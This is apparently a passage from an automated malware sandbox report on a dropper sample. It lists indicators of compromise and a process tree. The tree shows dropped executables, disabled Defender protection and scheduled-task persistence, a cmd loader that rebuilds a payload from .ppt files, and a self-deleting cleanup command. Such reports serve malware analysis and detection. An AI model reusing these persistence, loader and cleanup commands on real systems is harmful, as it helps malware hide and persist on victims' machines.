a0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Routes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Routes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Routes.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1520 PING.EXE

pid	process
1520	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	104	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	121	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exehEJWUzdpMzOf5MHzkz5rXZLP.exe

pid	process
2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1504
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

zHHMLouApJwoLxDCuvVJ1LGE.exetjoZYFEsViS0L_WZpyXQAzmU.exehfwjjfg

pid process

656 zHHMLouApJwoLxDCuvVJ1LGE.exe
1600 tjoZYFEsViS0L_WZpyXQAzmU.exe
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
4136 hfwjjfg

pid	process
1504

pid	process
656	zHHMLouApJwoLxDCuvVJ1LGE.exe
1600	tjoZYFEsViS0L_WZpyXQAzmU.exe
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
1504
4136	hfwjjfg

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

njtxLurSSstAnBp60ScL4OzD.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2960	njtxLurSSstAnBp60ScL4OzD.exe
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeShutdownPrivilege	1504
Token: SeCreatePagefilePrivilege	1504
Token: SeCreateTokenPrivilege	4072	explorer.exe
Token: SeAssignPrimaryTokenPrivilege	4072	explorer.exe
Token: SeLockMemoryPrivilege	4072	explorer.exe
Token: SeIncreaseQuotaPrivilege	4072	explorer.exe
Token: SeMachineAccountPrivilege	4072	explorer.exe
Token: SeTcbPrivilege	4072	explorer.exe
Token: SeSecurityPrivilege	4072	explorer.exe
Token: SeTakeOwnershipPrivilege	4072	explorer.exe
Token: SeLoadDriverPrivilege	4072	explorer.exe
Token: SeSystemProfilePrivilege	4072	explorer.exe
Token: SeSystemtimePrivilege	4072	explorer.exe
Token: SeProfSingleProcessPrivilege	4072	explorer.exe
Token: SeIncBasePriorityPrivilege	4072	explorer.exe
Token: SeCreatePagefilePrivilege	4072	explorer.exe
Token: SeCreatePermanentPrivilege	4072	explorer.exe
Token: SeBackupPrivilege	4072	explorer.exe
Token: SeRestorePrivilege	4072	explorer.exe
Token: SeShutdownPrivilege	4072	explorer.exe
Token: SeDebugPrivilege	4072	explorer.exe
Token: SeAuditPrivilege	4072	explorer.exe
Token: SeSystemEnvironmentPrivilege	4072	explorer.exe
Token: SeChangeNotifyPrivilege	4072	explorer.exe
Token: SeRemoteShutdownPrivilege	4072	explorer.exe
Token: SeUndockPrivilege	4072	explorer.exe
Token: SeSyncAgentPrivilege	4072	explorer.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

Routes.exeNostra.exe.pif

pid	process
3764	Routes.exe
1504
1504
896	Nostra.exe.pif
1504
1504
896	Nostra.exe.pif
896	Nostra.exe.pif
1504
1504
3764	Routes.exe
3764	Routes.exe
1504
1504
3764	Routes.exe
3764	Routes.exe
3764	Routes.exe
3764	Routes.exe
1504
1504
1504
1504
1504
1504
1504
1504

Suspicious use of SendNotifyMessage 8 IoCs

Processes:

Nostra.exe.pifRoutes.exe

pid process

896 Nostra.exe.pif
896 Nostra.exe.pif
896 Nostra.exe.pif
3764 Routes.exe
3764 Routes.exe
3764 Routes.exe
3764 Routes.exe
3764 Routes.exe

pid	process
896	Nostra.exe.pif
896	Nostra.exe.pif
896	Nostra.exe.pif
3764	Routes.exe
3764	Routes.exe
3764	Routes.exe
3764	Routes.exe
3764	Routes.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

Conhost.exen1qMhVvLc1ozD0wTDraEdadw.exeliyong.exeConhost.exeD399M1F691226D6.exeD9D20IFKDJGI77J.exe

pid	process
1140	Conhost.exe
1140	Conhost.exe
3180	n1qMhVvLc1ozD0wTDraEdadw.exe
3180	n1qMhVvLc1ozD0wTDraEdadw.exe
3632	liyong.exe
3632	liyong.exe
412	Conhost.exe
412	Conhost.exe
4124	D399M1F691226D6.exe
4124	D399M1F691226D6.exe
2496	D9D20IFKDJGI77J.exe
2496	D9D20IFKDJGI77J.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe2ITJQLFb1fRKK35OCQkaLI8Z.exeUtFxxoBeRgcMQipR8oQNPhS7.exeg99WJ5VR8TEJFwsXsTkJNJin.exeConhost.exeHB7WwFP_QCu3QwzuG59xAp0U.exeInstall.execmd.exeoE3SzOZclk1Z_QOY7l6mFPQU.exeWerFault.exe

description	pid	process	target process
PID 2408 wrote to memory of 4328	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	hEJWUzdpMzOf5MHzkz5rXZLP.exe
PID 2408 wrote to memory of 4328	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	hEJWUzdpMzOf5MHzkz5rXZLP.exe
PID 2408 wrote to memory of 4596	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	2ITJQLFb1fRKK35OCQkaLI8Z.exe
PID 2408 wrote to memory of 4596	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	2ITJQLFb1fRKK35OCQkaLI8Z.exe
PID 2408 wrote to memory of 4596	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	2ITJQLFb1fRKK35OCQkaLI8Z.exe
PID 2408 wrote to memory of 656	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	zHHMLouApJwoLxDCuvVJ1LGE.exe
PID 2408 wrote to memory of 656	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	zHHMLouApJwoLxDCuvVJ1LGE.exe
PID 2408 wrote to memory of 656	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	zHHMLouApJwoLxDCuvVJ1LGE.exe
PID 2408 wrote to memory of 2960	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	njtxLurSSstAnBp60ScL4OzD.exe
PID 2408 wrote to memory of 2960	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	njtxLurSSstAnBp60ScL4OzD.exe
PID 2408 wrote to memory of 2960	2408	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe	njtxLurSSstAnBp60ScL4OzD.exe
PID 4596 wrote to memory of 2204	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	UtFxxoBeRgcMQipR8oQNPhS7.exe
PID 4596 wrote to memory of 2204	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	UtFxxoBeRgcMQipR8oQNPhS7.exe
PID 4596 wrote to memory of 2204	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	UtFxxoBeRgcMQipR8oQNPhS7.exe
PID 4596 wrote to memory of 2068	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	schtasks.exe
PID 4596 wrote to memory of 2068	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	schtasks.exe
PID 4596 wrote to memory of 2068	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	schtasks.exe
PID 4596 wrote to memory of 2284	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	schtasks.exe
PID 4596 wrote to memory of 2284	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	schtasks.exe
PID 4596 wrote to memory of 2284	4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe	schtasks.exe
PID 2204 wrote to memory of 2912	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	dR67sfejpm98xkNS841XLYG5.exe
PID 2204 wrote to memory of 2912	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	dR67sfejpm98xkNS841XLYG5.exe
PID 2204 wrote to memory of 4580	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
PID 2204 wrote to memory of 4580	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
PID 2204 wrote to memory of 4580	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
PID 2204 wrote to memory of 4804	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	g99WJ5VR8TEJFwsXsTkJNJin.exe
PID 2204 wrote to memory of 4804	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	g99WJ5VR8TEJFwsXsTkJNJin.exe
PID 2204 wrote to memory of 4804	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	g99WJ5VR8TEJFwsXsTkJNJin.exe
PID 2204 wrote to memory of 1012	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	6vET8y_A8bX42BlhY8UaUxMU.exe
PID 2204 wrote to memory of 1012	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	6vET8y_A8bX42BlhY8UaUxMU.exe
PID 2204 wrote to memory of 2348	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	HB7WwFP_QCu3QwzuG59xAp0U.exe
PID 2204 wrote to memory of 2348	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	HB7WwFP_QCu3QwzuG59xAp0U.exe
PID 2204 wrote to memory of 2348	2204	UtFxxoBeRgcMQipR8oQNPhS7.exe	HB7WwFP_QCu3QwzuG59xAp0U.exe
PID 2204 wrote to memory of 1140	2204		Conhost.exe
PID 2204 wrote to memory of 1140	2204		Conhost.exe
PID 2204 wrote to memory of 1140	2204		Conhost.exe
PID 4804 wrote to memory of 2676	4804	g99WJ5VR8TEJFwsXsTkJNJin.exe	powershell.exe
PID 4804 wrote to memory of 2676	4804	g99WJ5VR8TEJFwsXsTkJNJin.exe	powershell.exe
PID 4804 wrote to memory of 2676	4804	g99WJ5VR8TEJFwsXsTkJNJin.exe	powershell.exe
PID 2204 wrote to memory of 1600	2204		tjoZYFEsViS0L_WZpyXQAzmU.exe
PID 2204 wrote to memory of 1600	2204		tjoZYFEsViS0L_WZpyXQAzmU.exe
PID 2204 wrote to memory of 1600	2204		tjoZYFEsViS0L_WZpyXQAzmU.exe
PID 4804 wrote to memory of 4420	4804	g99WJ5VR8TEJFwsXsTkJNJin.exe	cmd.exe
PID 4804 wrote to memory of 4420	4804	g99WJ5VR8TEJFwsXsTkJNJin.exe	cmd.exe
PID 4804 wrote to memory of 4420	4804	g99WJ5VR8TEJFwsXsTkJNJin.exe	cmd.exe
PID 1140 wrote to memory of 3180	1140	Conhost.exe	n1qMhVvLc1ozD0wTDraEdadw.exe
PID 1140 wrote to memory of 3180	1140	Conhost.exe	n1qMhVvLc1ozD0wTDraEdadw.exe
PID 1140 wrote to memory of 3180	1140	Conhost.exe	n1qMhVvLc1ozD0wTDraEdadw.exe
PID 2348 wrote to memory of 3708	2348	HB7WwFP_QCu3QwzuG59xAp0U.exe	Install.exe
PID 2348 wrote to memory of 3708	2348	HB7WwFP_QCu3QwzuG59xAp0U.exe	Install.exe
PID 2348 wrote to memory of 3708	2348	HB7WwFP_QCu3QwzuG59xAp0U.exe	Install.exe
PID 3708 wrote to memory of 1988	3708	Install.exe	Install.exe
PID 3708 wrote to memory of 1988	3708	Install.exe	Install.exe
PID 3708 wrote to memory of 1988	3708	Install.exe	Install.exe
PID 4420 wrote to memory of 2496	4420	cmd.exe	cmd.exe
PID 4420 wrote to memory of 2496	4420	cmd.exe	cmd.exe
PID 4420 wrote to memory of 2496	4420	cmd.exe	cmd.exe
PID 2204 wrote to memory of 2984	2204		oE3SzOZclk1Z_QOY7l6mFPQU.exe
PID 2204 wrote to memory of 2984	2204		oE3SzOZclk1Z_QOY7l6mFPQU.exe
PID 2204 wrote to memory of 2984	2204		oE3SzOZclk1Z_QOY7l6mFPQU.exe
PID 2984 wrote to memory of 328	2984	oE3SzOZclk1Z_QOY7l6mFPQU.exe	TrdngAnlzr2249.exe
PID 2984 wrote to memory of 328	2984	oE3SzOZclk1Z_QOY7l6mFPQU.exe	TrdngAnlzr2249.exe
PID 2984 wrote to memory of 328	2984	oE3SzOZclk1Z_QOY7l6mFPQU.exe	TrdngAnlzr2249.exe
PID 116 wrote to memory of 4596	116	WerFault.exe	reg.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
"C:\Users\Admin\AppData\Local\Temp\a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2408

C:\Users\Admin\Pictures\Adobe Films\hEJWUzdpMzOf5MHzkz5rXZLP.exe
"C:\Users\Admin\Pictures\Adobe Films\hEJWUzdpMzOf5MHzkz5rXZLP.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4328

C:\Users\Admin\Pictures\Adobe Films\2ITJQLFb1fRKK35OCQkaLI8Z.exe
"C:\Users\Admin\Pictures\Adobe Films\2ITJQLFb1fRKK35OCQkaLI8Z.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4596

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2068

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2284

C:\Users\Admin\Documents\UtFxxoBeRgcMQipR8oQNPhS7.exe
"C:\Users\Admin\Documents\UtFxxoBeRgcMQipR8oQNPhS7.exe"
3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2204

C:\Users\Admin\Pictures\Adobe Films\dR67sfejpm98xkNS841XLYG5.exe
"C:\Users\Admin\Pictures\Adobe Films\dR67sfejpm98xkNS841XLYG5.exe"
4⤵
- Executes dropped EXE
PID:2912

C:\Users\Admin\Pictures\Adobe Films\g99WJ5VR8TEJFwsXsTkJNJin.exe
"C:\Users\Admin\Pictures\Adobe Films\g99WJ5VR8TEJFwsXsTkJNJin.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\SysWOW64\dllhost.exe
dllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer847345
5⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Questo.ppt & ping -n 5 localhost
5⤵
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:2496

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
7⤵
- Enumerates processes with tasklist
PID:1140

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
7⤵
PID:4504

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt
7⤵
PID:636

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nostra.exe.pif
Nostra.exe.pif f
7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:896

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:1520

C:\Users\Admin\Pictures\Adobe Films\2ZKn48jDnGI4veQXh7HXPajY.exe
"C:\Users\Admin\Pictures\Adobe Films\2ZKn48jDnGI4veQXh7HXPajY.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 288
5⤵
- Program crash
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 768
5⤵
- Program crash
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 776
5⤵
- Program crash
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 800
5⤵
- Program crash
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 808
5⤵
- Program crash
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 984
5⤵
- Program crash
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1016
5⤵
- Program crash
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1376
5⤵
- Program crash
PID:1692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "2ZKn48jDnGI4veQXh7HXPajY.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\2ZKn48jDnGI4veQXh7HXPajY.exe" & exit
5⤵
PID:1908

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "2ZKn48jDnGI4veQXh7HXPajY.exe" /f
6⤵
- Kills process with taskkill
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 496
5⤵
- Program crash
PID:2156

C:\Users\Admin\Pictures\Adobe Films\HB7WwFP_QCu3QwzuG59xAp0U.exe
